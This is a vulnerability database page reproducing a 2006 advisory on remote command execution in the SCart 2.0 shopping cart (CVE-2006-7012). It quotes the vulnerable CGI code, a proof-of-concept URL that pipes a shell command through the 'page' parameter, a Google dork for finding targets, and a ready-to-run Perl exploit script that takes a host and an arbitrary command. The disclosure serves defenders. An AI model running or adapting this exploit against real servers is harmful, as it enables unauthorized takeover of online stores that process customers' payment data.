SCart 2.0 Remote Code Execution

2007.02.17
Credit: M.Hasran Addahroni
Risk: High
Local: No
Remote: Yes
CVE: CVE-2006-7012
CWE: CWE-Other
Dork: site:scartserver.com


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

____________________ ___ ___ ________ \_ _____/\_ ___ \ / | \\_____ \ | __)_ / \ \// ~ \/ | \ | \\ \___\ Y / | /_______ / \______ /\___|_ /\_______ / \/ \/ \/ \/ .OR.ID ECHO_ADV_32$2006 ------------------------------------------------------------------------ --- [ECHO_ADV_32$2006] SCart 2.0 Remote Code Execution ------------------------------------------------------------------------ --- Author : M.Hasran Addahroni a.k.a K-159 Date : June, 3th 2006 Location : Indonesia, Bali Web : http://advisories.echo.or.id/adv/adv32-K-159-2006.txt Critical Lvl : Highly critical Impact : System access Where : From Remote ------------------------------------------------------------------------ --- Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SCart Application : SCart version : 2.0 URL : http://www.scartserver.com Description : SCart is a free shopping cart online store service with e-commerce and real-time credit card and check payment processing service. ------------------------------------------------------------------------ --- Vulnerability: ~~~~~~~~~~~~~~~~ In scart.cgi we have source code like this -----------------------scart.cgi----------------------------- ... require 'scart.pl'; require '/home/scart/cgi-bin/2.0/scartserver.cgi'; ... -------------------------------------------------------------- then at scartserver.cgi in cgi-bin folder the code like this ---------------scartserver.cgi-------------------------------- ... $HTML{TAB2} = "$baseurl$cgiurl/?action=show_page&base=base2.html&page=browse.txt"; $HTML{TAB3} = "$baseurl$cgiurl/?action=show_page&base=base3.html&page=specials.txt"; $HTML{BUTTONBAR} = $buttonbar; $HTML{VIEWCART} = "$baseurl$cgiurl?action=viewcart"; $HTML{CHECKOUT} = "$secureurl$cgiurl?action=checkout"; $HTML{TRACK} = "$baseurl$cgiurl?action=show_track"; $HTML{HELP} = "$baseurl$cgiurl/?action=show_page&base=base.html&page=help.txt"; ... ------------------------------------------------------------------ Variables $baseurl and $cgiurl are not properly sanitized.This can be used to execute arbitrary commands. Proof Of Concept: ~~~~~~~~~~~~~~~~~ http://www.scartserver.com/2.0/[client_user_name]/scart.cgi/?action=show _page&base=base2.html&page=|id| Solution: ~~~~~~~~~ no solution yet Notification: ~~~~~~~~~~~~ vendor was contact but no response. ------------------------------------------------------------------------ --- Shoutz: ~~~~~~~ ~ ping - my dearest wife, for all the luv the tears n the breath ~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S`to,lirva32,anonymous,kaiten ~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,bayl aw ~ sinChan,x`shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #aikmel #e-c-h-o @irc.dal.net ------------------------------------------------------------------------ --- Contact: ~~~~~~~~ K-159 || echo|staff || eufrato[at]gmail[dot]com Homepage: http://k-159.echo.or.id/ -------------------------------- [ EOF ] ---------------------------------- Perl Exploit: ~~~~~~~~~~~~ #!/usr/bin/perl ## # SCart 2.0 Remote Code Execution Exploit # Bugs Found & code By K-159 # ## base on advisory at http://advisories.echo.or.id/adv/adv32-K-159-2006.txt # # echo.or.id (c) 2006 # ## # usage: # perl scart.pl <target> </path/> "cmd" # # Google Dork : site:scartserver.com # # Greetz: my soul mate,echo|staff,aikmel|crew,masterpop3,SinChan,rizal,etc # # Contact: eufrato[at]gmail.com www.echo.or.id #e-c-h-o @irc.dal.net # use IO::Socket; use LWP::Simple; sub Usage { print STDERR "\n ========================================================= \r\n"; print STDERR " *SCart 2.0 Remote Code Execution Exploit* \r\n"; print STDERR " Bugs Found by K-159 \r\n"; print STDERR " www.echo.or.id #e-c-h-o irc.dal.net \r\n"; print STDERR " Usage: $0 <www.target.com> </path/> \"cmd\" \r\n"; print STDERR "============================================================= \r\n"; exit; } if (@ARGV < 3) { Usage(); } $host = @ARGV[0]; $path = @ARGV[1]; $command = @ARGV[2]; print "\n[+] Conecting to $host\n"; my $result = get("http://$host$path/scart.cgi?action=show_page&base=base2.html&page=b rowse.txt|$command|"); if (defined $result) { print $result; } else { print "Exploit Failed.\n"; }


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top